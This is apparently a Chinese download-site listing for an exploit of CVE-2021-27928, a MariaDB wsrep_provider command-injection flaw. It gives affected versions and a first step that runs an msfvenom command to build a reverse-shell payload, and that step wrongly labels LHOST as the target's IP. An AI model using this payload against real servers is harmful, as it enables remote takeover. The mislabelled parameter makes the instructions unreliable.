
CVE-2021-27928: MariaDB MySQL-wsrep 提供商命令注入漏洞...
5星
- 浏览量: 0
- 大小:None
- 文件类型:ZIP
简介:
该简介描述的是一个针对MariaDB MySQL-wsrep插件的严重安全漏洞(CVE-2021-27928),允许远程攻击者通过精心构造的请求执行任意系统命令,对数据库系统的安全性构成重大威胁。此漏洞的存在使得黑客有机会控制服务器并访问敏感数据。建议用户尽快更新到最新版本以修复该问题。
Exploit Title: MariaDB 10.2 MySQL - wsrep_provider OS Command Execution
Date: 03/18/2021
Exploit Author: Central InfoSec
Versions Affected:
- MariaDB 10.2 before 10.2.37
- MariaDB 10.3 before 10.3.28
- MariaDB 10.4 before 10.4.18
- MariaDB 10.5 before 10.5.9
Tested on: Linux
CVE : CVE-2021-27928
如何利用:
步骤1:建立反向Shell有效负载
msfvenom -p linux/x64/shell LHOST=目标IP地址 LPORT=端口号 -f raw > payload.bin
全部评论 (0)
还没有任何评论哟~


